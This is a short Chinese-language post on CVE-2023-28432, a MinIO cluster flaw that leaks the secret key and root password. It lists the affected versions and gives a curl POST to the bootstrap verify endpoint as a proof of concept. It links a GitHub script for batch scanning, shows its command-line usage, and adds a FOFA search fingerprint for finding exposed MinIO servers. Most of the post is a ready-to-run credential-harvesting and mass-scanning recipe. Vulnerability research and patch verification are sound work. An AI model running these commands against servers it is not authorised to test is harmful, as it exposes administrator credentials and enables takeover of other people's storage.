MinIO信息泄露漏洞(CVE-2023-28432)批量检测P

概述

MinIO 是一种开源对象存储服务，与 Amazon S3 API 兼容，可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统，可以存储大量数据，并提供高速的数据读写能力。MinIO采用分布式架构，可以在多个节点上运行，实现数据的分布式存储和处理。
在集群部署的Minio中，未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息（MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD），可能导致攻击者以管理员权限登录Minio。

影响范围

漏洞利用的前提是使用分布式部署
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

poc

简单检测

curl -XPOST http://172.16.16.128:9001/minio/bootstrap/v1/verify
http://IP:9000/minio/bootstrap/v1/verify

批量检测(url.txt里边必须加协议)

https://github.com/MzzdToT/CVE-2023-28432

Fofa指纹

app="minio"

python3 minio.py -u http://127.0.0.1:1111 单个url测试

python3 minio.py -f url.txt 批量检测 (url.txt里边必须加协议)

扫描结束后会在当前目录生成存在漏洞url的vuln.txt